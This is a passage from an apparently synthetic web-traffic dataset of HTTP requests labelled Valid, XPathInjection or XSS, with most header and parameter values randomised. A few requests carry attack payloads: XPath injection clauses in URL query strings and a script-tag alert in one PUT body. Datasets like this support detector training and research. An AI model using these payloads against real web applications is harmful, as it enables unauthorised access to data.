~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 501
Start - Id: 19007
class: Valid
GET /dMrH/9AO8c47/1FkE3RnaQobGWq@b/nn1t/eTfL2l4eRyupZ@6Q9f60/teeq4i1net/access_log38Bgz@position94.Ugr/2htpassFUphpYKechogjh/lzuzBkV.gH.p9k/gs0stmzvqCEaI/oENeCbo.php?pn=fKtht+ HTTP/1.0
Host: 63.6.158.152
Connection: oltznb
Accept: image/jpeg
Accept-Charset: x-mac-hebrew;q=0.5, windows-1257, us-ascii;q=0.9, iso-8859-9
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=12378
Client-ip: 227.16.86.109
Cookie: mtini2h=pek;aiselectbinenye/ 0a
Cookie2: $Version="14"
Date: Sat, 20 Jun 09 04:08:18 CET
ETag: W/"PxVEB1q-KROBxCvQTDZ"
Expect: 8ee5fjqi=chyktiir;0ineeln
From: teiyc@nuhni81dA.fr
If-Modified-Since: Wed, 26 Aug 09 19:53:18 CET
If-Unmodified-Since: Mon, 20 Apr 09 06:54:46 GMT
If-Match: "1SHVWuE9hREhm-wj398"
If-None-Match: *
If-Range: *
Max-Forwards: 3099
MIME-Version: 8.1
Pragma: tit7n='ihx'
Proxy-Authorization: Basic dDFzaGRzaXU6c2VkaUllMg==
Authorization: NTLM bGVVZGNscnRiZTVTeWVidW1sdmhlcnF6c3VuaGNjb25sdGh0c3M=
Range: 9-7161,-63
Referer: http://www.OtolY.com/whs16l/M9shy/nleooea.nsf
TE: trailers,trailers,gzip;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/9.8 (Windows; U; Windows NT 7.4; ei-ad; rv:3.8.5) Gecko/97334965
UA-CPU: 68000
UA-Disp: 017,5137,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 890x6831
Via: teg1ee/0.7 234.247.192.128:7388, FTP/7.9 157.119.236.251
Transfer-Encoding: compress
Upgrade: tsnbwM/6.3, tlua8/1.6
Warning: 097 131.235.92.163:74694 "1HrdrfsFeisainaJx" "Tue, 01 May 07 01:17:00 CET"
X-Forwarded-For: 144.31.247.88
X-Serial-Number: 27260320301
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19007
Start - Id: 10064
class: Valid
GET /KsQRqy9b_3VxR/ztEdenortxo/insTurj2P6DWw/demu/eetnjlna/oiahsOkafNE8ibzoEtle/gzaaheliHiwb/vXGF7epTtZt.css?fjZhC=xkmebgesteXRaok&inuc=kestr&cualtAeit=syianttseW&rtfb83sf=jEsm&aet=8159671&sseoqnco=9gRvy&aeltcnynr=%7Chp&vu=%3E HTTP/1.1
Host: 208.51.108.221:80
Connection: close
Accept: application/*;q=0.9, application/*;q=0.1
Accept-Charset: *
Accept-Encoding: identity;q=0.8, identity, deflate;q=0.4
Accept-Language: *;q=0.4
Cache-Control: max-age=08
Client-ip: 104.169.228.37
Cookie: Chissh=a\iS
Cookie2: $Version="98"
Date: Thu, 30 Oct 08 20:32:47 UTC
ETag: W/"fZL-CgdQBuZcfNUqK"
Expect: hhY7a=oeoy5utD;aogxu1qn
From: aemYeste@u736nnw.biz
If-Modified-Since: Fri, 01 May 09 20:17:37 UTC
If-Unmodified-Since: Thu, 18 May 06 22:10:31 GMT
If-Match: *
If-None-Match: "jefRDcDQubE3GaLe"
If-Range: "WMGaW1.3eD1X_PQZH3"
Max-Forwards: 0057
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: s8uvfp astdo3=rgfps9
Authorization: Basic azEzaWg6c1lmNXg=
Range: 0143-8
Referer: /f8elO.htm
TE: deflate;q=0.0,trailers
Trailer: Host
User-Agent: eLN_d5 http://www.Hlharlie.gov
UA-CPU: 68000
UA-Disp: 3720,8490,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6453x8240
Via: osgsr/4.0 www.gatlrwn.tiff, 0.9 www.Tttb0q.jpeg:2824
Transfer-Encoding: identity
Upgrade: dioExt/5.6, 5ost/5.4
Warning: 334 201.54.73.174:7 "ostm1" 
X-Forwarded-For: 189.69.165.224
X-Serial-Number: 905480693565962672
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10064
Start - Id: 21218
class: Valid
GET /Le2e4naOeh1e/i6kS0NNkSD/sred3uste8iqt/erU-v4Xq2SIf/nf2O.o/ei-54--51O/od7Z.Lq3mD2fdmhm989u/tnPeqginSsugtsofre/x7ZvvtEWAKd.shtml?@@execa.G=ebtu&1dsoar0=7141&tgaaswfinorrp=Boh0acian&3passthrugSRlikeN3documentsV=h9hieex623lB5Eu&sslteevu4ef=h+hlike&eesybobttsb=o7mig2ncGo&nnon=deeOrndpoOeias&ias=alomh5oubTNeqi&arcw4tCa1fqxdt=6u4i HTTP/1.1
Host: www.Sgesasiys.uk:80
Connection: efoax
Accept: audio/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 94.29.16.110
Cookie: UU5MlH9FqQt=|sock_streamt optj\tonphp?fand0a;9etlaeNnh=5ths8ue;simu=q>ynE)
Cookie2: $Version="49"
Date: Fri, 30 Jan 04 17:16:31 GMT
ETag: "J6k5_eWAz4_ASMA"
Expect: oybtosee
From: vEvaeak@i1auid.st
If-Modified-Since: Thu, 03 Mar 05 13:56:44 CET
If-Unmodified-Since: Wed, 28 Jun 06 04:10:02 GMT
If-Match: *
If-None-Match: "4KBGVEl0ei4T.WpZ"
If-Range: Sat, 28 Mar 09 24:46:52 GMT
Max-Forwards: 598
MIME-Version: 6.1
Pragma: sZhrI='6'
Proxy-Authorization: NTLM eGVyZ3VybWRlc2ZsZmFkZnNvdG9haVd2NW5pNThzdXJzdHBldA==
Authorization: aoodrn d1ghPs=tutig
Range: 14-4533,9-6,-7926
Referer: http://www.rwShn0a.ch/dgaNaib.cfm
TE: trailers,deflate
Trailer: Upgrade
User-Agent: euehlnmdethe5oema
UA-CPU: MIPS
UA-Disp: 158,905,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 402x543
Via: 9.4 www.te8Rc.shtml, FTP/1.9 www.rzyf5.shtml
Transfer-Encoding: deflate
Upgrade: paa/5.3, a9Au/8.0
Warning: 474 205.133.110.111 "znelncj" "Mon, 25 Jan 10 21:18:40 UTC"
X-Forwarded-For: 235.168.20.114
X-Serial-Number: 51497571
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21218
Start - Id: 2561
class: Valid
GET /gv/sN/nt6Aearhsyaoloaf3aEa/nLFrsyihaEegtocct/@xm/mv7Bkg_8nci/u4zoEJ3F.P.asmx?rlnaerlaehE2=x%7Eeec&tlEuyhuugas7oim=%29rv0a&EMate5=%27ttz%26remnph-o+gli+r0&otadE3nyieiof0=o+bxe&onilemyo=erazytuttti+h&sseceoagg=eupdatewtmailin&otr0ermssah2=7613&cttge=74875253&raderneoo0hnoro=alls%3Dh%3Eteqier&N6isiwHw=59 HTTP/1.0
Host: 107.11.18.88:53572
Connection: close
Accept: application/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: c-i4e, s-spnuNoE4;q=0.1, ztg-Di
Cache-Control: min-fresh=7336
Client-ip: 25.60.8.161
Cookie: emrRemjwea=68;wrichern=hlda-Hi%logelaw;tni=7eI1etadiwirexIe
Cookie2: $Version="10"
Date: Sat, 12 Apr 08 12:36:52 GMT
ETag: W/"Rd-eDP4S-C12qZ15"
Expect: 100-continue
From: ieohme@e4Eagleie.fr
If-Modified-Since: Wed, 27 Aug 08 06:09:50 CET
If-Unmodified-Since: Thu, 22 Nov 07 01:51:15 CET
If-Match: "WWy61PhsPuEmWZ8Xoj"
If-None-Match: "5MgHJrv0UiWIwR_BCO"
If-Range: "2URm52PL20q.K-ht"
Max-Forwards: 00
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest username="8x3ge"
Authorization: Basic QmJvb1I6dGRpU2xydw==
Range: -836,37315-,23-
Referer: /j8ti/edtos/hhOc/msrsi/eaeold.exe
TE: trailers
Trailer: If-Range
User-Agent: x9oyoseeteaH
UA-CPU: Sparc
UA-Disp: 3636,1361,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 266x8527
Via: sar/1.9 28.122.213.138, 2.0 100.251.67.232
Transfer-Encoding: identity
Upgrade: ms8e/5.5, bc0udr/8.6
Warning: 953 www.h8zy.png "teAfk" "Tue, 09 May 06 12:50:35 CET"
X-Forwarded-For: 194.83.60.232
X-Serial-Number: 8053339262095703049
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2561
Start - Id: 49916
class: XPathInjection
GET /05/hteF/ix1V7/Ek16az4i./SlLidEOformBmocha/ar9qziteedNrt7xliee0/PVUUgW/efhicwhlthrnqe.sh?tS=53++++or+e29a%2Ftv6nt%2Fftoa8%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D1%5D++or++0%3D HTTP/1.1
Host: www.kt0dO8.st:80
Connection: slmca
Accept: image/*;q=0.7, text/html
Accept-Charset: iso-8859-9, iso-8859-2, iso-8859-6, x-mac-ce;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 71.34.148.218
Cookie: as1Eothlh=46Tbs;Yopen_link_ExlbF=wNFV4AaRbZU;05r2l=tiprocessing-instruction;4le9irena=?i;r$gE%no;veenlyetmhwnrr=Ee5;uSe9Thaa9=043
Cookie2: $Version="34"
Date: Mon, 02 Nov 09 17:35:53 GMT
ETag: "-PkzT_C75R64usx5m"
Expect: shiNeesn=gk8dcin
From: aelt@h8mn.it
If-Modified-Since: Mon, 12 Jun 06 01:16:34 GMT
If-Unmodified-Since: Tue, 08 Dec 09 15:50:55 CET
If-Match: "gkfWp0qvfpSrV1@I"
If-None-Match: "ml4grFkCdxqT-bECajWu"
If-Range: *
Max-Forwards: 9
MIME-Version: 8.6
Pragma: toGj='zc6ugyan'
Proxy-Authorization: NTLM d2Rha2V0dHZsd3NyZmVzc25Ub25jaW5lZGVrc3RvZWttckpFbmN1c2w=
Authorization: Digest algorithm=MD5-sess
Range: -983
Referer: /nwdr/tNgaplmi/eeoaet/hcNrm.jsp
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.1 (compatible; Konqueror/3.0; Open BSD i586; 7fxnvdn)
UA-CPU: MIPS
UA-Disp: 3308,0110,8
Via: 3.0 www.Dhedxco1.tiff:567, 9.2 186.80.68.54:0801
Transfer-Encoding: compress
Upgrade: ldT/6.4
Warning: 667 135.165.221.99:10 "Vigl" 
X-Serial-Number: 2013029504
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49916
Start - Id: 2962
class: Valid
GET /7ijiteYjyipoUtmxdee/om/ydcopyUiMBF0Nwheren/sodQpqp4aafeee9lst/hemaadAes5/ekj_A03hZ1/uBgP9Il.lRmVVOk/imgEH/eJSYrl.jpg?i0vorrShsuc6P=359883968&gzrctet4ggess=fwgetfatr HTTP/1.1
Host: 36.25.187.69
Connection: close
Accept: audio/basic;q=0.9, audio/x-wav;q=0.6
Accept-Charset: iso-2022-jp;q=0.3
Accept-Encoding: identity, gzip, deflate
Accept-Language: *
Cache-Control: n9i=orsteeh
Client-ip: 27.132.127.51
Cookie: tplNas8G=s eab?agIwj2d;l3idea=83117;@i@u4_XD_=aJ@ef;sgnoeei=et51n<htq;gii (bpr ;esaGgei4etee=6egiymz0;rcHhongee=0848421129
Cookie2: $Version="1"
Date: Thu, 29 Jul 04 18:09:01 UTC
ETag: W/"gkaRWdgtR1N8TwMOaI@"
Expect: 100-continue
From: Iohco@rBgrnzg.net
If-Modified-Since: Fri, 05 Aug 05 02:52:42 CET
If-Unmodified-Since: Thu, 12 Jan 06 09:48:10 CET
If-Match: "A_DWtfWsW9fD7TZcM"
If-None-Match: *
If-Range: "3v_P8YiqkVWdPtu2y3at"
Max-Forwards: 7820
MIME-Version: 1.3
Pragma: AyC=eEtEw
Proxy-Authorization: Basic bGUxcjpiQTlh
Authorization: Digest response="BdD9bcBEfcb48D884C6dE1dDC64202D2"
Range: 81466-,-72397
Referer: /mii3z3s/e15q0Ce.nsf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: 1n6s4krxdegk
UA-CPU: StrongARM
UA-Disp: 088,2412,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8247x2505
Via: 3.1 www.enee.shtml
Transfer-Encoding: compress
Upgrade: er1/3.7, ohbtar/9.6, igrns/9.6, QebnrE/9.1, rWoN/5.7
Warning: 679 121.176.212.56 "aajSEEaaS9ry" "Wed, 04 Oct 06 05:54:46 CET"
X-Forwarded-For: 230.76.229.166
X-Serial-Number: 1920071
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2962
Start - Id: 20726
class: Valid
GET /RO/irBm/yAZaiftpEQ/iA6L1vF1.1vnmeG8TXH.jsp?aohow2isr=iI.CC9L3d&Henri=gom7ndOenraordu&nU6ta=exec0heid&sw8oIK=i6qy&de2oxmomneaw=%28%29iMtnn3ncmde%2F&srt=9107452&_TvN=atiC&n7ofta2bs5hn=208591 HTTP/1.0
Host: 182.80.177.50:17
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: oo=cglqiraa
Client-ip: 173.194.244.159
Cookie: ukzrliar4n=eht;Seadh=e5jrz;e2t13ewrhehf=llsrUT;cztRcpsiMqqsv=aSTrmTypue;qnhqOit=brietn
Cookie2: $Version="0"
Date: Sat, 13 Dec 08 03:43:30 UTC
ETag: W/"w6ax5AP9iiUNMxNU5"
Expect: 100-continue
From: mupderg@gn978yed5.fr
If-Modified-Since: Thu, 09 Apr 09 10:34:25 GMT
If-Unmodified-Since: Tue, 23 Feb 10 20:45:32 CET
If-Match: *
If-None-Match: "2hD2EXiyeHjlzUWF."
If-Range: Sat, 29 Mar 08 24:27:26 GMT
Max-Forwards: 9
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest nc=ce10aCbC
Authorization: Basic bzZ0bDY6dWFsaWVybnc=
Range: 161725-433276,-8,-97
Referer: /afwiE/aWtEr9/6css/soasoo/9qeesaq.jpg
TE: chunked;q=0.5,chunked,trailers
Trailer: If-Range
User-Agent: tYv86A http://www.eTsoeRd6.cz
UA-CPU: MIPS
UA-Disp: 8501,806,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 413x553
Via: FTP/1.4 www.fcAeb.css, tgh3ro/8.3 www.0Cop.tiff, 2.0 187.249.51.181
Transfer-Encoding: weio; r1igb=a7eoz
Upgrade: 3tlgha/2.3
Warning: 447 156.37.10.161 "oa0itiorbaoej2" 
X-Forwarded-For: 255.159.77.194
X-Serial-Number: 43053635016402500046
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20726
Start - Id: 46948
class: XSS
PUT /1mtreEesT4sintabbu/sZgauHX99URlgz/1tunidaaENuo/itw2IcEtsqa/oaRmosHvrnSewst/tdc/e-hqsnK/eh0lDSecftubee/baGondoteiadrha/eRy5zInwpB8bS2/cwp-window.openLT.tiff? HTTP/1.0
Content-Length: 252
Content-Language: tuc
Content-Encoding: gzip
Content-Location: http://www.h6ettue.de/8bipn/nAutt/5altbtl/2Jmt/ai2ds.htm
Content-MD5: dGVuanBpaXRTcm9obWVTdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Apr 05 04:41:52 GMT
Last-Modified: Sat, 15 Mar 08 09:36:08 CET
Host: www.eot5.ch
Connection: SoNr
Accept: */*;q=0.8
Accept-Charset: shift_jis
Accept-Encoding: 
Accept-Language: u0kp-ih
Cache-Control: no-store
Client-ip: 19.178.124.208
Cookie: afys3nrelsN=nmnertiw
Cookie2: $Version="22"
Date: Sat, 14 Aug 04 06:09:22 CET
ETag: "2QUjnUW_IVja0L.6aDN"
Expect: mexltil=sUytWu
From: 2cxo@n9mijtAeoE.biz
If-Modified-Since: Wed, 24 Nov 04 04:58:07 UTC
If-Unmodified-Since: Sun, 08 Jul 07 12:09:50 CET
If-Match: "S4vIIFLQRqZ8yp.V.L1V"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 5.4
Pragma: p9hhai93='Thmsaurf'
Proxy-Authorization: Basic Z2VveGk6ZXRhbjFvdA==
Authorization: EbVht ttmrelsa=rtwds
Range: -3291
Referer: http://dnHh8tUf.cz/rpm3/hlaota/klctwo9/tabs49Ft.nsf
TE: trailers,chunked;q=0.2,trailers
User-Agent: o0fl/3.4
UA-Color: color8
Via: 1.4 171.15.76.222, FTP/9.9 248.146.7.124
Transfer-Encoding: lukLdw
Upgrade: eOo/2.9, nd6H1f/1.0, mciu/8.9
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Alrtwlwrct3=524697&ent5tentgt=736012&spe=&4hane t+one&ec8h8lxhhhIsa=833&hnSdecl=fmNgme&tsohjhfae3dccos=t8zIgelsL&m9Sdonry=yLh&iafn=&<script    >[alert  ('oetiel');]</script   >&Onu=59850227&ahieooetlio=55N&iajdej0a=opennrH

End - Id: 46948
Start - Id: 26993
class: Valid
GET /9TWliit/-L73Q4/jiizo6non/nM283P/0L28R7hcWfx/1AROnCBxG/lpooatrevssSidha9pNs/sdce/wY8PH4-zj2RCpS9.mdb?tsntncor=0hdt&b3=breAuI&d9jtYeamtaera4=a1VM&wlNenora4om=0&arat=eo5uaiepbeoSrsai2r&nsuhncrtOhePyv=Tl%28etcohpszi&Voozi=c%24lCcg8eniga&th=013491682&iS-ts3mw=gEQDd HTTP/1.0
Host: www.ltxlze.biz
Connection: Hajin
Accept: application/postscript;q=0.6
Accept-Charset: cp-950, cp-950;q=0.6, iso-2022-jp, big5;q=0.7, iso-8859-6;q=0.0
Accept-Encoding: deflate;q=0.4
Accept-Language: twcsoltb-ejtp;q=0.9
Cache-Control: no-transform
Client-ip: 232.114.144.52
Cookie: .9mTl8sSFf=njnstwZmRqs2ao;Xtdeai=irmgisThf;rrmunbeofo=75767;yomihferodish9h=wsnbyaocvazblo8t
Cookie2: $Version="7"
Date: Sat, 12 Jun 04 24:11:53 CET
ETag: W/"1@UOzaG_Gim0Z4_S"
Expect: detriet
From: ccie@hbtetOyn.uk
If-Modified-Since: Tue, 19 Feb 08 22:55:46 UTC
If-Unmodified-Since: Tue, 20 Apr 04 05:58:47 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM amM4aWludDZXaXNzaUVyaEMwb25vMWxld2NhbHRhZGU=
Authorization: Digest nc=B63Da7CE
Range: 85-,-37180,-7541
Referer: http://sp0RExo3.ch/ed2n/haeecE3a/Dosbyord/ieebsc.asp
TE: chunked,trailers
Trailer: Accept-Charset
User-Agent: tbLcewb (auM@4QKf3)
UA-CPU: Sparc
UA-Disp: 655,087,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6860x985
Via: 3.0 www.t9e8t.shtml, 6.4 253.109.109.232, HTTP/0.3 www.rhrmi.shtml
Transfer-Encoding: compress
Upgrade: ANntc/1.7, uAietl/2.6, xdoo/8.8, iomte/2.0
Warning: 349 www.ieeei.png "m7sE6oeiEscsnataOs" 
X-Forwarded-For: 126.84.101.124
X-Serial-Number: 38778310771476495
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26993
Start - Id: 24203
class: Valid
GET /winpasswd6UtC9nlq/EQL.html? HTTP/1.0
Host: www.pogielra4.biz:80
Connection: keep-alive
Accept: image/png
Accept-Charset: shift_jis, windows-1255, iso-8859-6;q=0.9
Accept-Encoding: identity, deflate
Accept-Language: *
Cache-Control: eSvd=mihx
Client-ip: 170.39.21.142
Cookie: batqhierAsg4vey=OEgsgo3oaoclgdn
Cookie2: $Version="564"
Date: Thu, 13 Oct 05 23:37:00 CET
ETag: W/"d4RMo3ppA5gVFGw"
Expect: 100-continue
From: vktxen@eejuti.biz
If-Modified-Since: Fri, 14 Jul 06 01:01:36 UTC
If-Unmodified-Since: Thu, 12 Feb 04 10:02:27 CET
If-Match: "JtO_jpn-k2kO7.y5e"
If-None-Match: *
If-Range: "YwaLzbXpwO0-D9JahH"
Max-Forwards: 98
MIME-Version: 5.0
Pragma: koe2e5=tanIy
Proxy-Authorization: Iccdm brwetH=oa0t
Authorization: LTnH te1t=pftt
Range: 497-0048,6-
Referer: http://www.saer.ch/grtas2.asmx
TE: gzip;q=0.3
Trailer: Warning
User-Agent: tsnsCcl5e/8.2.3.4
UA-CPU: 68000
UA-Disp: 7755,8327,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 146x610
Via: FTP/0.0 101.162.88.118, FTP/0.2 142.39.65.104:012
Transfer-Encoding: compress
Upgrade: ees/5.3, ellt4t/5.4, hudaht/4.5, eEt/9.9, faaa/7.5
Warning: 155 147.225.115.94 "lnnt" 
X-Forwarded-For: 254.110.118.39
X-Serial-Number: 42275938447231485
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24203
Start - Id: 18168
class: Valid
GET /tNv/p@Pnoui@c44/3eii0gikto/lvoho4r5e/rXnU3c9N1QjlA/u..tOusrgU7-q7Zz2/G7wp-z_SdHJ0YJ.asmx? HTTP/1.1
Host: www.esiaoeui96.net:80
Connection: nnie4
Accept: video/*;q=0.6, application/zip, video/mpeg;q=0.2
Accept-Charset: x-mac-ce, gb2312, windows-874, windows-1254;q=0.0, cp-932
Accept-Encoding: 
Accept-Language: neytesr-7at8eWe, sxrodc-niqtoi5t;q=0.9, gL-ol6oyiin, tr-nc9;q=0.5, trings-na;q=0.4
Cache-Control: no-cache
Client-ip: 43.149.237.246
Cookie: Aitmaadese3pai=uslm8atl
Cookie2: $Version="508"
Date: Tue, 27 Jan 09 10:32:32 GMT
ETag: W/"9U2ZAnylyXyu8AzjCNj"
Expect: 100-continue
From: udml@oe5nd.uk
If-Modified-Since: Mon, 16 Apr 07 07:59:30 UTC
If-Unmodified-Since: Tue, 18 May 04 10:53:29 CET
If-Match: "g.hOfGIIWeYu4rknWb"
If-None-Match: "9mG6SlSl9c0FidRcBi@"
If-Range: "MG.fA3BJAOD7N.nJKQrW"
Max-Forwards: 122
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM bzJuTGVlaVducmxpbXNhc21OdGU1bEZsaWF0dGVlam9ydw==
Authorization: Digest username="dtr2cTi"
Range: 875436-348852,-818
Referer: http://www.drtp2T2r.biz/mdhhi2.jpeg
TE: deflate,gzip;q=0.6
Trailer: Pragma
User-Agent: eiErveSe (qytGnbGzOW; ycP4Md; r4qj0d)
UA-CPU: MIPS
UA-Disp: 904,033,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3922x0648
Via: FTP/2.2 34.93.49.220
Transfer-Encoding: neehae; no0nen=ATiwlds
Upgrade: receba/6.4, n0ete/3.0, 8dtoRs/5.6, voa/4.8
Warning: 282 www.mtd6lng.tiff "rqniee0sohncxoe" 
X-Forwarded-For: 53.225.75.3
X-Serial-Number: 45102302554958015
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18168
Start - Id: 28321
class: Valid
GET /aAUlV2CGFtVKuX_wC/da/eDkL5j.ein/h5c./tlas2Dn/6KVeKIWKbOtQL/0objectaoqM.aspx?kKekP=5rectldnhlo%27irr&n2hW=uicrwsmtelt1akdnt&rienvafxeeail=nH_oXbm3eR&uunnnote=usNi%3CV%3A&oetGgtaaTk=o9A&home_EI=167&zyjn2=OeEwgetp&hvff=eesht&civS=l.Wf..NUkG&8Am5ea7dwqh=80265315&bcooanagroc9n=77649539 HTTP/1.0
Host: 2.173.203.143
Connection: close
Accept: video/*, text/plain;q=0.1, application/*
Accept-Charset: x-mac-japanese;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 33.66.117.12
Cookie: eitgti=t;ytyibmtn=luaeim0ruahomeneorh:;I3exu=173
Cookie2: $Version="256"
Date: Fri, 27 Jun 08 17:59:09 GMT
ETag: "8Twi41_@XztXskW"
Expect: 100-continue
From: uo4ee7@tp9n.net
If-Modified-Since: Sun, 15 Jul 07 13:26:31 GMT
If-Unmodified-Since: Fri, 21 May 04 12:14:33 GMT
If-Match: "Pn3FhhiJvRCpcYbf"
If-None-Match: *
If-Range: *
Max-Forwards: 27
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="pniifin"
Authorization: Gntt itshsBlh=a1bxuye
Range: 1084-,9187-,-3
Referer: /nolnrfo/muiris/iomm/pmpIth50.cfm
TE: gzip;q=0.4,deflate;q=0.2
Trailer: Max-Forwards
User-Agent: Mozilla/0.6 (X11; U; Linux i386 3.0; mz-cU; rv:1.5.5) Gecko/67864025
UA-CPU: PowerPC
UA-Disp: 5474,653,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 680x9650
Via: 5.5 29.190.36.177, 9.7 www.bneas8sx.gif
Transfer-Encoding: 2lncs; MsdaeYn=gyd3sc
Upgrade: amcAh/7.2, emad3/8.4, oatab/2.4
Warning: 911 196.37.232.17 "eetcelei" 
X-Forwarded-For: 146.40.109.99
X-Serial-Number: 4245119888
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28321
Start - Id: 35826
class: XPathInjection
GET /rdnhisokrmdmHep.php3?ihTmti19arrzeoa=le&tr3o64eemnn=141661846&cikBY.@styleeu=nhopie%2Fht%2Fah%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D213%5D+++%7C+++fhnm%2Fhw%2Fpl%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D52%5D++++or+%27slrae%27++%3D+%27&Egtinhvsi=tenIaxt&ttsroo9oqaimso=nvLQVGE&gnibc=9%28tto8%5C&FK5I4vbscript3o=cr1u%5Cch&u51pymgalt=kos&iwmlrdvcai=oh&Y4tc4en68t6xur=2354934&twhis3ayrtwM=eraieXeyrsnntrH&nl9tenou6ioeite=04859 HTTP/1.1
Host: www.iShaAay.com
Connection: keep-alive
Accept: application/x-tar;q=0.8, application/postscript, text/plain
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 139.91.97.81
Cookie: 6thiu=asozUlh;nzwt=8331;wpiframem9No=694
Cookie2: $Version="2"
Date: Tue, 03 Mar 09 08:59:46 UTC
ETag: W/"lpsbtCm1cdq5sF5ek"
Expect: 100-continue
From: a2frd@mttrrPoVI.gov
If-Modified-Since: Mon, 16 Feb 04 23:55:54 CET
If-Unmodified-Since: Mon, 27 Aug 07 21:33:03 UTC
If-Match: "rJlwgPm0OVPJPWl0h"
If-None-Match: *
If-Range: *
Max-Forwards: 51
MIME-Version: 2.2
Pragma: UibIih4n='apr'
Proxy-Authorization: ctrva 6eFteS=Yswi
Authorization: NTLM bGplUmlzMkU5QWhzdGVjc2lkczBmb2Vjb1VqdHFhc1MwZW5wdA==
Range: 77-,-9
Referer: /henqih/aoUhe.fgf
TE: gzip;q=0.8,gzip
Trailer: Referer
User-Agent: n8rolnj1se15nnaqrkne
UA-CPU: x86
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: FTP/0.1 www.brrsnuo.html
Transfer-Encoding: identity
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 351 24.73.41.38:3 "Asogrdto" 
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 62972291005
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35826
Start - Id: 5927
class: Valid
PUT /PadqBfw2sami_Q3SC/eq7Zo_/childwBXbodypsAdJk1/xoc6leewdre/1odoscAi5sce/aLB/Nyddmmg2/tiGq.YSWcb8y/mYD5CT3RaOeyjW7.asp? HTTP/1.1
Content-Length: 237
Content-Language: ewtn,n6eiwros
Content-Encoding: deflate
Content-Location: http://nioTady.de/oegreu/mtleoy.css
Content-MD5: czhyaHRlYmFhaWdzNGFveQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 May 04 23:14:31 CET
Last-Modified: Mon, 01 Jan 07 09:14:14 GMT
Host: 36.195.200.136
Connection: pT4meaar
Accept: */*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 182.209.58.87
Cookie: fCNBx@eFbrC=828
Cookie2: $Version="9"
Date: Sun, 29 Mar 09 22:50:31 UTC
ETag: "l8dbmR3HfMvEZ6HEalYM"
Expect: brrcfr=ileAr;ohgl=iazsL
From: ytiErse@6nevoaelou.cz
If-Modified-Since: Wed, 15 Oct 08 05:11:06 GMT
If-Unmodified-Since: Fri, 08 Jun 07 14:20:01 CET
If-Match: *
If-None-Match: "92oqILA6XWSF1TfZ-"
If-Range: Mon, 30 May 05 06:02:40 GMT
Max-Forwards: 615
MIME-Version: 7.5
Pragma: a=rn
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=kht0N
Range: 1731-
Referer: /9liethy.asp
TE: deflate
Trailer: Range
User-Agent: Mozilla/7.8 (X11; U; Linux i386 6.5; ls-ee; rv:6.3.1) Gecko/13270252
